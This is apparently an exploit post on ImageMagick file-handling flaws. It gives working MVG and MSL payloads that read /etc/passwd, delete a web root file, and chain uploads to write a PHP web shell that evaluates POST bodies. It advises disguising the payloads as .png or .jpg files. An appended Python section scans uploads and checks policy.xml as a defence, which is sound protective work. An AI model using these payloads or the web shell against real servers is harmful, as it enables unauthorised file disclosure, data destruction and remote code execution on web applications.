Credit to @CrazedSec for original paper, ID 4698

ImageMagick is vulnerable to a variety of attacks that allow reading, deleting,
and writing files.

Here are some useful tricks to complement the fill 'url()' vulnerability
described by @CrazedSec.

@air


== 1 ==

It's possible to read arbitrary files from a web server by uploading an
ImageMagick Vector Graphics file (MVG) that the web application processes with
ImageMagick:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:@/etc/passwd'
pop graphic-context

As is the case with all of these vulnerabilities, the file doesn't need to be
uploaded with a .mvg extension.  You can change it to .png, .jpg, or anything
else.

If the file doesn't exist, you'll see the @ symbol plus the filename as the
output.


== 2 ==

You can use a similar technique to delete a file, provided ImageMagick is built
with support for its ephemeral protocol:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'ephemeral:/var/www/index.php'
pop graphic-context


== 3 ==

You can move files around, provided you're able to determine the location of
uploaded files.  This can be used to upload new files as well as overwrite
existing files.

first_image.png:

<?xml version="1.0" encoding="UTF-8"?>
<image>
    <read filename="/var/www/uploads/second_image.png"/>
    <write filename="/var/www/hi.php"/>
</image>


second_image.png:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>'
pop graphic-context


third_image.png:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'
pop graphic-context
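The three tricks above share one root: an image file whose content is really an MVG or MSL document, steering ImageMagick into a coder (label:@file, ephemeral:, msl:, url()) that touches the filesystem or the network. The following Python script is an added example, not code from the original post or from ImageMagick, showing the two checks a defender wants in front of an upload endpoint: a content scan that ignores the extension (because ImageMagick sniffs the bytes, so the .png rename is irrelevant), and a checker for policy.xml that confirms the risky coders and the @file indirection are denied. The coder list and the `@*` path rule follow the published ImageTragick policy.xml recommendation; the names RASTER_MAGIC, scan_upload and policy_gaps, the regex fingerprints and the sample inputs are my own constructions, and the textual scan is a heuristic complement to the policy, not a substitute for it.

```python
"""Defender-side checks for uploads ImageMagick will process (added example,
not the original post's code or ImageMagick's own)."""
import re
import xml.etree.ElementTree as ET

# Magic bytes of the raster formats an upload endpoint normally means to accept.
RASTER_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Coders the ImageTragick policy.xml recommendation disables.  The post above
# abuses EPHEMERAL, MSL and MVG; the fill url() trick goes through URL/HTTPS.
RISKY_CODERS = ("EPHEMERAL", "URL", "HTTPS", "MVG", "MSL", "TEXT", "SHOW", "WIN", "PLT")

# Textual fingerprints (my own heuristics).  ImageMagick sniffs content (its
# magic.xml maps "push graphic-context" to MVG), so the scan looks at bytes,
# never at the file name.
MVG_RE = re.compile(rb"(?i)push\s+graphic-context|viewbox\s+\d")
MSL_RE = re.compile(rb"(?i)<\s*(image|read|write|group)\b")
CODER_REF_RE = re.compile(rb"(?i)\b(ephemeral|msl|label|url|https?|ftp|mvg|text|show|win|plt):")
AT_FILE_RE = re.compile(rb"(?i)label:@")      # label:@/path makes the label from a file
FILL_URL_RE = re.compile(rb"(?i)\burl\s*\(")  # fill url(...) from the referenced paper


def magic_matches(data: bytes, declared_ext: str) -> bool:
    """True if the first bytes are what the declared extension promises."""
    magic = RASTER_MAGIC.get(declared_ext.lower().lstrip("."))
    return magic is not None and data.startswith(magic)


def scan_upload(data: bytes, declared_ext: str) -> list:
    """Findings for one upload; an empty list means a plain raster file.
    A file whose magic matches its extension is decoded by that raster coder,
    so the textual scan runs only when the magic is wrong.  Only the first
    64 KiB are inspected: MVG/MSL payloads are tiny."""
    if magic_matches(data, declared_ext):
        return []
    findings = ["magic-mismatch:" + declared_ext.lower().lstrip(".")]
    head = data[:65536]
    if MVG_RE.search(head):
        findings.append("mvg-syntax")
    if MSL_RE.search(head):
        findings.append("msl-syntax")
    for m in CODER_REF_RE.finditer(head):
        findings.append("coder-ref:" + m.group(1).decode("ascii").lower())
    if AT_FILE_RE.search(head):
        findings.append("at-file")
    if FILL_URL_RE.search(head):
        findings.append("fill-url")
    return findings


def policy_gaps(policy_xml: str, required=RISKY_CODERS) -> set:
    """Coders from `required` that a policy.xml does not deny, plus "PATH:@*"
    when the @file indirection used by label:@ is not blocked.  Patterns are
    matched literally (no glob expansion), which is how the recommended
    policy is written."""
    root = ET.fromstring(policy_xml)
    denied, at_blocked = set(), False
    for p in root.iter("policy"):
        if p.get("rights") != "none":
            continue
        if p.get("domain") == "coder":
            denied.add(p.get("pattern", "").upper())
        elif p.get("domain") == "path" and p.get("pattern") == "@*":
            at_blocked = True
    gaps = set() if "*" in denied else {c for c in required if c not in denied}
    if not at_blocked:
        gaps.add("PATH:@*")
    return gaps


# Constructed samples, not captured uploads.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
SAMPLE_MVG = (b"push graphic-context\n  viewbox 0 0 1024 1024\n"
              b"  image over 0,0 0,0 'label:@/etc/passwd'\npop graphic-context\n")
SAMPLE_MSL = (b'<?xml version="1.0" encoding="UTF-8"?>\n<image>\n'
              b'  <read filename="/tmp/in.png"/>\n  <write filename="/tmp/out.png"/>\n</image>\n')
HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
  <policy domain="path" rights="none" pattern="@*" />
</policymap>"""

if __name__ == "__main__":
    for name, data, ext in (("png", SAMPLE_PNG, "png"), ("mvg", SAMPLE_MVG, "png"),
                            ("msl", SAMPLE_MSL, "jpg")):
        print(name, scan_upload(data, ext) or "clean")
    print("policy gaps:", policy_gaps(HARDENED_POLICY) or "none")
```

The content scan is a first line of defence that an attacker can work around with a format the regexes do not know, which is why policy_gaps is the check that matters: it reads the policy.xml ImageMagick actually loads and reports any coder from the recommended deny list that is still enabled. Running it against a stock policy.xml will typically report every entry as a gap, since the defaults do not deny these coders.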


# siph0n [2016-05-16]